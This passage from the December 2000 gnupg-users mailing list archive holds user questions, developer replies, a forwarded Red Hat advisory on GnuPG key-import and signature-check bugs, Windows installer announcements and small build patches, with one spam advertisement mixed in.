ingo@mathA.rwth-aachen.de Thu Dec 21 09:18:53 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Thu, 21 Dec 2000 10:18:53 +0100 Subject: "gpg - invalid armor header" warning In-Reply-To: References: Message-ID: <00122110185302.30241@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 20. December 2000 22:35, Tom Beidler wrote: > I'm working with an ISP and trying to help him trouble shoot some > issues. > > He's running GNUPG 1.04 and he's trying to import a PGP 6. something > public key. He's telling me he's getting a "gpg - invalid armor > header" error. I was able to add the key successfully to my PGP key > ring. Can you import PGP keys? I didn't see anything in the FAQ or > the "How to." Have a look at the mailing list archives (lists.gnupg.org). IIRC importing the key with PGP, reexporting it and importing it with GnuPG sometimes helps. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Qcr+qUQWN/hplRsRAoRTAKDD4UJ2CNp+zprun4txC/CJXBxlAwCgicGn iscp4fdcEriqVGgGrnZcPbE= =wgg4 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Thu Dec 21 16:10:52 2000 From: rich@cnylug.org (Rich) Date: Thu, 21 Dec 2000 11:10:52 -0500 Subject: Does IDEA violate the GPL? Message-ID: <3A422B8C35C.EE80RICH@mail.dreamscape.com> So did we ever decide for certain if the adding of the IDEA cipher violates the GPL? Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Thu Dec 21 19:00:09 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 21 Dec 2000 20:00:09 +0100 Subject: Does IDEA violate the GPL? In-Reply-To: <3A422B8C35C.EE80RICH@mail.dreamscape.com> References: <3A422B8C35C.EE80RICH@mail.dreamscape.com> Message-ID: <873dfh8urq.fsf@deneb.enyo.de> Rich writes: > So did we ever decide for certain if the adding of the IDEA cipher > violates the GPL? You have to ask the FSF to get a definite answer, not Werner. The FSF is the copyright holder of GnuPG, so they will sue you, and not Werner. ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From BCrowder@origin.ea.com Thu Dec 21 20:50:22 2000 From: BCrowder@origin.ea.com (Crowder, Brian) Date: Thu, 21 Dec 2000 14:50:22 -0600 Subject: Does IDEA violate the GPL? Message-ID: <2292DBED5A978A498EABCCE95524499E2C47C8@osi-postal.origin.ea.com> Seems like the IDEA copyright/patent holders would sue you first. > -----Original Message----- > From: Florian Weimer [mailto:fw@deneb.enyo.de] > Sent: Thursday, December 21, 2000 1:00 PM > To: Rich > Cc: gnupg-users@gnupg.org > Subject: Re: Does IDEA violate the GPL? > > > Rich writes: > > > So did we ever decide for certain if the adding of the IDEA cipher > > violates the GPL? > > You have to ask the FSF to get a definite answer, not Werner. The > FSF is the copyright holder of GnuPG, so they will sue you, and not > Werner. ;-) > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From hj4hj6@yahoo.com Thu Dec 21 01:27:56 2000 From: hj4hj6@yahoo.com (hj4hj6@yahoo.com) Date: 21 Dec 00 1:27:56 PM Subject: Improve your stepfamily life Message-ID: <26BN6MpZlQ05vPlHFv> Does your stepfamily life resemble a soap opera more than it does the Brady Bunch? The Stepfamily Association of America invites you to participate in THE NATIONAL CONFERENCE FOR STEPFAMILIES, Feb. 23-24, 2001, at the New Orleans Marriott Hotel. This is an opportunity, designed by knowledgeable professionals, in stepfamilies themselves, to help you: * Make your remarriage a success * Create bonds with your stepchildren * Help your children adjust emotionally * Manage money matters unique to your family * Get more help from legal, financial, psychological advisors * Overcome stepfather and stepmother stereotypes * Elicit cooperation from your children's schools * Bring more harmony into family life Complete conference details at http://www.edupr.com REGISTER ONLINE! Attend, and also enjoy Mardi Gras week in New Orleans! Special discounts for couples, students, groups. HOTEL IS BOOKING UP FAST. ACT NOW BEFORE ROOM BLOCK AND AIRLINE SEATS FILL Special rates for conference attendees. Visit http://www.edupr.com for discounts. Childcare available through a bonded local service. Up to 17 professional development credits available if you are an educator, clinician, financial planner, social worker. Questions? Email stepfamilyconf@mail.com If you would like to be removed, please email us back with the word "Remove" in the subject line. We apologize for any inconvenience. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dbergst@phoenixdsl.com Fri Dec 22 01:29:58 2000 From: dbergst@phoenixdsl.com (David R. Bergstein) Date: Thu, 21 Dec 2000 20:29:58 -0500 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 Message-ID: <00122120295801.15261@bluesman.drb.net> Can anyone comment on this recent security advisory, and whether any of RedHat's patches have been submitted to the gnupg cvs? Sincerely, -- David R. Bergstein Systems Engineer and Blues Musician - http://members.phoenixdsl.com/~dbergst Heart of Blue - bookings on-line at http://www.heartofblue.com GnuPG Public Key 0x460A4F20 - For info see http://www.gnupg.org Key fingerprint = F65D A2E0 805C C6D0 78EC 61AC 34C0 BB74 460A 4F20 ________________________________________________________________________ Life is a yo-yo, and mankind ties knots in the string. ---------- Forwarded Message ---------- Subject: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 Date: Wed, 20 Dec 2000 07:53:55 -0700 From: "Kurt Seifried" To: "linsec" LSLID:2000122005 --------------------------------------------------------------------- Red Hat, Inc. Red Hat Security Advisory Synopsis: Updated gnupg packages now available Advisory ID: RHSA-2000:131-02 Issue date: 2000-12-19 Updated on: 2000-12-19 Product: Red Hat Linux Keywords: gnupg secret-key web-of-trust detached-signature Cross references: --------------------------------------------------------------------- 1. Topic: Updated gnupg packages are now available for Red Hat Linux 6.x and 7. 2. Relevant releases/architectures: Red Hat Linux 6.2 - alpha, i386, sparc Red Hat Linux 7.0 - alpha, i386 3. Problem description: When importing keys from public key servers, GnuPG will import private keys (also known as secret keys) in addition to public keys. If this happens, the user's web of trust becomes corrupted. Additionally, when used to check detached signatures, if the data file being checked contained clearsigned data, GnuPG would not warn the user if the detached signature was incorrect. 4. Solution: For each RPM for your particular architecture, run: rpm -Fvh [filename] where filename is the name of the RPM. 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info): 21889 - Web of trust circumvention by secret key distribution 21498 - Detached signature verification vulnerability 6. RPMs required: Red Hat Linux 6.2: SRPMS: ftp://updates.redhat.com//6.2/SRPMS/gnupg-1.0.4-8.6.x.src.rpm alpha: ftp://updates.redhat.com//6.2/alpha/gnupg-1.0.4-8.6.x.alpha.rpm i386: ftp://updates.redhat.com//6.2/i386/gnupg-1.0.4-8.6.x.i386.rpm sparc: ftp://updates.redhat.com//6.2/sparc/gnupg-1.0.4-8.6.x.sparc.rpm Red Hat Linux 7.0: SRPMS: ftp://updates.redhat.com//7.0/SRPMS/gnupg-1.0.4-8.6.x.src.rpm ftp://updates.redhat.com//7.0/SRPMS/gnupg-1.0.4-9.src.rpm alpha: ftp://updates.redhat.com//7.0/alpha/gnupg-1.0.4-9.alpha.rpm i386: ftp://updates.redhat.com//7.0/i386/gnupg-1.0.4-9.i386.rpm 7. Verification: MD5 sum Package Name -------------------------------------------------------------------------- aae767039effc37d4a929428e0d19543 6.2/alpha/gnupg-1.0.4-8.6.x.alpha.rpm 887b2d7d888fb8ee84c81cee7832384e 6.2/i386/gnupg-1.0.4-8.6.x.i386.rpm d7a3124166bc5c35cd3ca2dec36c97e0 6.2/sparc/gnupg-1.0.4-8.6.x.sparc.rpm 1f476ae8f5453655a4a61174de187d15 7.0/alpha/gnupg-1.0.4-9.alpha.rpm 88ac7d34da177b6c469e0f2a0f6117e6 7.0/i386/gnupg-1.0.4-9.i386.rpm 5e454eb08ce03f26eccbf7007026cd56 6.2/SRPMS/gnupg-1.0.4-8.6.x.src.rpm 4e81b35255980b0884e2f1ae3cf026d5 7.0/SRPMS/gnupg-1.0.4-9.src.rpm These packages are GPG signed by Red Hat, Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg 8. References: ftp://ftp.gnupg.org/pub/gcrypt/gnupg/gnupg-1.0.4.security-patch1.diff http://lists.gnupg.org/gnupg-devel-200012/msg00026.html http://lists.gnupg.org/gnupg-devel-200012/msg00028.html Copyright(c) 2000 Red Hat, Inc. ------------------------------------------------------- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ed@eepatents.com Fri Dec 22 07:53:21 2000 From: ed@eepatents.com (Ed Suominen) Date: Fri, 22 Dec 2000 00:53:21 -0700 Subject: Win32 Installation Package for GPG/WinPT (improved) Message-ID: <5.0.2.1.0.20001220140520.029f4948@maia.netsonic.net> The first "actual" release of WinGPG, a Windows 9x, ME, NT, 2K installation package of GPG and Timo Schulz's great little WinPT program, is now available at ftp://eepatents.com/clients/wingpg.exe. The ZIP archive is available at ftp://eepatents.com/clients/wingpg.zip for those who just want to browse through the files. I've fixed numerous bugs since the beta release (though this is probably still a "beta" release and that was an "alpha"). It seems to work OK on a couple of PCs and seems to be very easy to use. Included in this release is my first public disclosure of a passphrase selection scheme I've invented and a user's guide ("ABC MANUAL") written in simple, clear language for the average computer user who doesn't know (or care) anything about cryptography. Timo and I plan to work together on the next release, and look forward to comments, suggestions, and the inevitable bug reports. (He's the real programmer - I'm just a frustrated PGP user and part-time crypto inventor who still remembers how to write batch files and who got tired of waiting for a Win32 installation package people could actually understand.) Have fun. Ed Suominen Registered Patent Agent Web Site: http://eepatents.com PGP Public Key: http://eepatents.com/key -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Slava Moiseev Fri Dec 22 12:19:07 2000 From: Slava Moiseev (Slava Moiseev) Date: Fri, 22 Dec 2000 12:19:07 +0000 Subject: Question!!! Message-ID: <4512.001222@intes.odessa.ua> Hello, I need to use gnupg under Win 98/NT and Linux(Red Hat). I sign and encrypt my data under Windows NT, but when I try to decrypt it under Linux I don't get my data. Gnupg gives Invalid Signature. What does that mean? Thanks. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Fri Dec 22 09:40:57 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 22 Dec 2000 10:40:57 +0100 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <00122120295801.15261@bluesman.drb.net> References: <00122120295801.15261@bluesman.drb.net> Message-ID: <87lmt8lro6.fsf@deneb.enyo.de> "David R. Bergstein" writes: > Can anyone comment on this recent security advisory, and whether any of > RedHat's patches have been submitted to the gnupg cvs? I suppose they have been taken from the CVS. These things were quickly fixed by Werner Koch once they were mentioned on gnupg-devel, but there's no official version yet which includes them. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andreas@netbank.com.br Fri Dec 22 11:57:58 2000 From: andreas@netbank.com.br (Andreas Hasenack) Date: Fri, 22 Dec 2000 09:57:58 -0200 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <87lmt8lro6.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Fri, Dec 22, 2000 at 10:40:57AM +0100 References: <00122120295801.15261@bluesman.drb.net> <87lmt8lro6.fsf@deneb.enyo.de> Message-ID: <20001222095758.J13751@conectiva.com.br> Em Fri, Dec 22, 2000 at 10:40:57AM +0100, Florian Weimer escreveu: > "David R. Bergstein" writes: > > > Can anyone comment on this recent security advisory, and whether any of > > RedHat's patches have been submitted to the gnupg cvs? > > I suppose they have been taken from the CVS. These things were > quickly fixed by Werner Koch once they were mentioned on gnupg-devel, > but there's no official version yet which includes them. Any news on a 1.0.5 release? -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From daniele@ripe.net Fri Dec 22 12:05:53 2000 From: daniele@ripe.net (Daniele Arena) Date: Fri, 22 Dec 2000 13:05:53 +0100 (CET) Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <87lmt8lro6.fsf@deneb.enyo.de> Message-ID: On 22 Dec 2000, Florian Weimer wrote: > I suppose they have been taken from the CVS. These things were > quickly fixed by Werner Koch once they were mentioned on gnupg-devel, > but there's no official version yet which includes them. Speaking of which, are there any plans to release 1.0.5 (incorporating the security fix and other patches) anytime soon (or not soon:)? No pressure meant, just curiosity. Cheers, Daniele. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From nalin@redhat.com Fri Dec 22 16:40:39 2000 From: nalin@redhat.com (Nalin Dahyabhai) Date: Fri, 22 Dec 2000 11:40:39 -0500 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <00122120295801.15261@bluesman.drb.net>; from dbergst@phoenixdsl.com on Thu, Dec 21, 2000 at 08:29:58PM -0500 References: <00122120295801.15261@bluesman.drb.net> Message-ID: <20001222114039.B4884@redhat.com> On Thu, Dec 21, 2000 at 08:29:58PM -0500, David R. Bergstein wrote: > Can anyone comment on this recent security advisory, and whether any of > RedHat's patches have been submitted to the gnupg cvs? There was nothing for us to submit for inclusion that hadn't already been committed earlier. Cheers, Nalin -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Fri Dec 22 17:06:08 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Fri, 22 Dec 2000 17:06:08 +0000 Subject: Test failure on NetBSD In-Reply-To: <20001218150453.A23106@nmrc.ie>; from lhecking@nmrc.ie on Mon, Dec 18, 2000 at 03:04:53PM +0000 References: <20001218150453.A23106@nmrc.ie> Message-ID: <20001222170608.A12051@nmrc.ie> > Whether the problem lies with dd or the assumption that it should > generate a zero size file if invoked as above, I cannot say. The test > works fine if I remove 0 from the loop, though. All I wrote applies equally to OpenBSD (2.8). I suspect that this is a BSD dd specific issue, never having observed this on Solaris, DU etc. Also, the following mini-patch eliminates a (harmless :) compiler warning. I'm not familiar at all with NLS, it may be better to ifdef this line and add the corresponding configure test. --- util/miscutil.c.orig Fri Dec 22 17:04:28 2000 +++ util/miscutil.c Wed Dec 20 02:10:39 2000 @@ -25,6 +25,7 @@ #include #include #ifdef HAVE_LANGINFO_H + #include #include #endif #include "types.h" -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Fri Dec 22 17:20:49 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Fri, 22 Dec 2000 11:20:49 -0600 Subject: AS/ 400 version? In-Reply-To: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 20, 2000 at 10:54:23AM +0100 References: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert> Message-ID: <20001222112048.A20866@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 20, 2000 at 10:54:23AM +0100, Stephan Stapel wrote: > Since I've been asked by a customer and didn't know an answer, I'll try to > ask the community: Is there an AS/ 400 version of GnuPG or did anyone ever > try to compile/ release a version for this platform? I looked, and never found anything. have you tried to compile it? I don't know much about the AS/400 platform, but I think there are compilers for it. However, I don't know if it would be trivial to compile... - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Q41np0PPDCS0QgIRAsE5AJ41D9Az3RFu/FALDeyRyyikcEJbpACeMdMU 7kT3mhFLVttJQiTs4vCX9HA= =So2c -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ed@eepatents.com Fri Dec 22 18:25:31 2000 From: ed@eepatents.com (Ed Suominen) Date: Fri, 22 Dec 2000 11:25:31 -0700 Subject: Unidentified subject! Message-ID: <5.0.2.1.0.20001222112404.029187d0@maia.netsonic.net> My apologies for posting incorrect URLs to WinGPG. The correct ones are: Installation file: ftp://eepatents.com/clients/wingpg-v1-00.exe ZIP archive for browsing individual files: ftp://eepatents.com/clients/wingpg-v1-00.zip I would appreciate any comments (positive and negative alike) from those who find the installation package (and the enclosed user's guide and passphrase selection worksheet) useful. Please copy Timo Schulz, the author of WinPT, at mailto:twoaday@freakmail.de. Ed Suominen Registered Patent Agent Web Site: http://eepatents.com PGP Public Key: http://eepatents.com/key -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:20:25 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:20:25 +0100 Subject: Answer??? (was: Question!!!) In-Reply-To: <4512.001222@intes.odessa.ua>; from mslava@intes.odessa.ua on Fri, Dec 22, 2000 at 12:19:07PM +0000 References: <4512.001222@intes.odessa.ua> Message-ID: <20001222202025.H32206@gnupg.de> On Fri, 22 Dec 2000, Slava Moiseev wrote: > Hello, I need to use gnupg under Win 98/NT and Linux(Red Hat). > I sign and encrypt my data under Windows NT, but when I try to > decrypt it under Linux I don't get my data. Gnupg gives Invalid What version of GnuPG are you using uner GNU/Linux? If it is less than 1.0.3 you have to upgrade. See the FAQ. Another workaround is to do a echo "disable-cipher-algo twofish" >>c:\\gnupg\options Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:08:07 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:08:07 +0100 Subject: AS/ 400 version? In-Reply-To: <20001222112048.A20866@aspirin.smsu.edu>; from minton@csc.smsu.edu on Fri, Dec 22, 2000 at 11:20:49AM -0600 References: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert> <20001222112048.A20866@aspirin.smsu.edu> Message-ID: <20001222200807.E32206@gnupg.de> On Fri, 22 Dec 2000, Brian Minton wrote: > I looked, and never found anything. have you tried to compile it? I don't > know much about the AS/400 platform, but I think there are compilers for it. I used to know the /38 but at the time of the /400 I ahve moved to other platforms :-) If the AS/400 has a Posix subsystem, you can make GnuPG work on it. It should also be possible to make it work on non-posix platforms - there is a Windoze and VMS version. The big problem, is on how to get the entropy for the RNG. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:13:39 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:13:39 +0100 Subject: Fwd: LSLID:2000122005 - RedHat - GnuPG - RHSA-2000:131-02 In-Reply-To: <00122120295801.15261@bluesman.drb.net>; from dbergst@phoenixdsl.com on Thu, Dec 21, 2000 at 08:29:58PM -0500 References: <00122120295801.15261@bluesman.drb.net> Message-ID: <20001222201339.F32206@gnupg.de> On Thu, 21 Dec 2000, David R. Bergstein wrote: > Can anyone comment on this recent security advisory, and whether any of > RedHat's patches have been submitted to the gnupg cvs? It is probably the same patch that I worked out with SuSE and Caldera. I don't think that I am able to release 1.0.5 this year. A lot of minor stuff has to be applied and I would like to make sure that 1.0.5 works fine with gpgme, most patches are included and well tested on several platforms. I will also give the translators some time to catch up before a release is done. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 22 19:27:39 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 22 Dec 2000 20:27:39 +0100 Subject: Test failure on NetBSD In-Reply-To: <20001222170608.A12051@nmrc.ie>; from lhecking@nmrc.ie on Fri, Dec 22, 2000 at 05:06:08PM +0000 References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> Message-ID: <20001222202739.I32206@gnupg.de> On Fri, 22 Dec 2000, Lars Hecking wrote: > All I wrote applies equally to OpenBSD (2.8). I suspect that this is a > BSD dd specific issue, never having observed this on Solaris, DU etc. It has been fixed in the CVS. > Also, the following mini-patch eliminates a (harmless :) compiler warning. > I'm not familiar at all with NLS, it may be better to ifdef this line and > add the corresponding configure test. I have found no reference for langinfo (IIRC, someone sent me the Sun man page), so I can't decided whether this is correct. glibc includes nl_types -w hich is what a Posix header file should do anyway. If it is a OpenBSD bug, it should be fixed there so that we don't need to make the configure file larger than the entire program. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bill@bcswebco.com Fri Dec 22 20:04:45 2000 From: bill@bcswebco.com (Bill) Date: Fri, 22 Dec 2000 14:04:45 -0600 Subject: Installing on a Virtual Host Message-ID: Hi - We are trying to install GPG on a site that is virtual hosted (Linux Redhat system). We do not have access to the root and wish install in the assigned directory - /home above the /www. 1. Can this be done? 2. If so, are there any links to sites/pages that can explain how to install this way. Please CC a reply to bill@bcswebco.com - we are not subscribed to this mailing list Thanks in advance and Happy Holidays to all!! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 22 22:36:13 2000 From: rich@cnylug.org (Rich) Date: Fri, 22 Dec 2000 17:36:13 -0500 Subject: Module code added to GnuPG? Message-ID: <3A43D75D12C.1D02RICH@mail.dreamscape.com> I saw this on the usenet a moment ago and didn't notice it posted to this group yet when I looked on lists.gnupg.org so I thought I'd cut and paste it into here from that group in case he hadn't. -------------------- Subject: GnuPG + IDEA for windows, now with Mingw32 >From: Disastry@saiknes.lv.NOSPAM.NET Newsgroups: alt.security.pgp -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 well, I finally installed MingW32 on linux and compiled GnuPG for Windows and modified one file (cipher/dynload.c) so that GnuPG now can load extension modules, including IDEA. (was very easy) go get patch, compiled executable and IDEA.dll here: http://disastry.dhs.org/pgp == == Disastry http://i.am/disastry/ http://disastry.dhs.org/pgp <-- PGP plugins for Netscape and MDaemon remove .NOSPAM.NET for email reply -----BEGIN PGP SIGNATURE----- Version: Netscape PGP half-Plugin 0.14 by Disastry / PGPsdk v1.7.1 iQA/AwUBOkNlOTBaTVEuJQxkEQLpnACg12uecXWTSblGqbMbUzNyraozp1cAn0Eu HSEfxGC5gg/E3+KWNrK7PTsH =OK4S -----END PGP SIGNATURE----- -------------------- Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From npolys@virtuworlds.com Fri Dec 22 21:44:34 2000 From: npolys@virtuworlds.com (Nicholas F. Polys) Date: Fri, 22 Dec 2000 21:44:34 -0000 Subject: embedding gpg for pgp compliant mail Message-ID: <01c06c60$5fdf64f0$fa6ddbd0@jahbepraised> Howdy all, does this sound familiar? web Form -> encryption ->email -> pgp mail front end (mac/pc) I am trying to write gpg encrypted data into a mail message for a pgp user. It is using a PGP generated public key which is imported and signed. I am using a public key which encrypts fine when working with local files. I've come up with a perl script that works similarly to PGPMail/formail: I open a couple of filehandles and print the temp file's contents into the body of the mail. the problem is, even with the same parameter calls, it is ending up writing in strange characters that are not recognized by pgp or similar to the local file encryption. I wonder if i am omitting any body headers or something? can anyone help? "|/gpg/location/gpg --output $gpgtmp --cipher-algo 3des --quiet --textmode --recipient $CONFIG{'pgpuserid'} --encrypt $Form_info" options file (compiled from clemen's thread): force-v3-sigs honor-http-proxy disable-pubkey-algo ELG disable-cipher-algo blowfish s2k-cipher-algo cast5 digest-algo sha1 compress-algo 1 no-secmem-warning lock-once escape-from-lines thanks and hippy holidays! all the best, _nick -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From npolys@virtuworlds.com Sat Dec 23 01:30:00 2000 From: npolys@virtuworlds.com (Nicholas F. Polys) Date: Sat, 23 Dec 2000 01:30:00 -0000 Subject: embedding gpg for pgp compliant mail Message-ID: <01c06c7f$dda999e0$d96ddbd0@jahbepraised> oh you mean the ascii-armor option, -a ? thanks, sorry for wasting bandwidth... pax max ! _nick -----Original Message----- From: Nicholas F. Polys To: gnupg-users@gnupg.org Date: Saturday, December 23, 2000 3:00 AM Subject: embedding gpg for pgp compliant mail >Howdy all, > >does this sound familiar? >web Form -> encryption ->email -> pgp mail front end (mac/pc) > > I am trying to write gpg encrypted data into a mail message for a pgp >user. >It is using a PGP generated public key which is imported and signed. > >I am using a public key which encrypts fine when working with local files. >I've come up with a perl script that works similarly to PGPMail/formail: >I open a couple of filehandles and print the temp file's contents into the >body of the mail. > >the problem is, even with the same parameter calls, it is ending up writing >in strange characters that are not recognized by pgp or similar to the local >file encryption. > >I wonder if i am omitting any body headers or something? >can anyone help? > > >"|/gpg/location/gpg --output $gpgtmp --cipher-algo >3des --quiet --textmode --recipient $CONFIG{'pgpuserid'} --encrypt >$Form_info" > >options file (compiled from clemen's thread): > >force-v3-sigs >honor-http-proxy >disable-pubkey-algo ELG >disable-cipher-algo blowfish >s2k-cipher-algo cast5 >digest-algo sha1 >compress-algo 1 >no-secmem-warning >lock-once >escape-from-lines > >thanks and hippy holidays! > >all the best, >_nick > > >-- >Archive is at http://lists.gnupg.org - Unsubscribe by sending mail >with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Sat Dec 23 11:38:12 2000 From: wk@gnupg.org (Werner Koch) Date: Sat, 23 Dec 2000 12:38:12 +0100 Subject: Module code added to GnuPG? In-Reply-To: <3A43D75D12C.1D02RICH@mail.dreamscape.com>; from rich@cnylug.org on Fri, Dec 22, 2000 at 05:36:13PM -0500 References: <3A43D75D12C.1D02RICH@mail.dreamscape.com> Message-ID: <20001223123812.M32206@gnupg.de> On Fri, 22 Dec 2000, Rich wrote: > I saw this on the usenet a moment ago and didn't notice it posted > to this group yet when I looked on lists.gnupg.org so I thought I'd > cut and paste it into here from that group in case he hadn't. It will be in the next release. It is already in the code but I need to make it work nicer with the configuration system. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Sat Dec 23 12:50:58 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 23 Dec 2000 13:50:58 +0100 Subject: Test failure on NetBSD In-Reply-To: <20001222170608.A12051@nmrc.ie> References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> Message-ID: <87elyz5mj1.fsf@deneb.enyo.de> Lars Hecking writes: > Also, the following mini-patch eliminates a (harmless :) compiler warning. > I'm not familiar at all with NLS, it may be better to ifdef this line and > add the corresponding configure test. Could you tell us the warning? miscutil.c doesn't use anything which is normally declared or defined in . -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Sat Dec 23 15:49:12 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Sat, 23 Dec 2000 15:49:12 +0000 Subject: Test failure on NetBSD In-Reply-To: <20001222202739.I32206@gnupg.de>; from wk@gnupg.org on Fri, Dec 22, 2000 at 08:27:39PM +0100 References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> <20001222202739.I32206@gnupg.de> Message-ID: <20001223154912.A21721@nmrc.ie> > > All I wrote applies equally to OpenBSD (2.8). I suspect that this is a > > BSD dd specific issue, never having observed this on Solaris, DU etc. > > It has been fixed in the CVS. Thanks! > I have found no reference for langinfo (IIRC, someone sent me the > Sun man page), so I can't decided whether this is correct. glibc > includes nl_types -w hich is what a Posix header file should do > anyway. If it is a OpenBSD bug, it should be fixed there so that we > don't need to make the configure file larger than the entire program. You are probably right. I found that Solaris' langinfo.h includes nl_types, and I've asked Marc to add it in OBSD, too. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Sat Dec 23 16:30:21 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Sat, 23 Dec 2000 16:30:21 +0000 Subject: Test failure on NetBSD In-Reply-To: <87elyz5mj1.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Sat, Dec 23, 2000 at 01:50:58PM +0100 References: <20001218150453.A23106@nmrc.ie> <20001222170608.A12051@nmrc.ie> <87elyz5mj1.fsf@deneb.enyo.de> Message-ID: <20001223163021.C21721@nmrc.ie> Florian Weimer writes: > Lars Hecking writes: > > > Also, the following mini-patch eliminates a 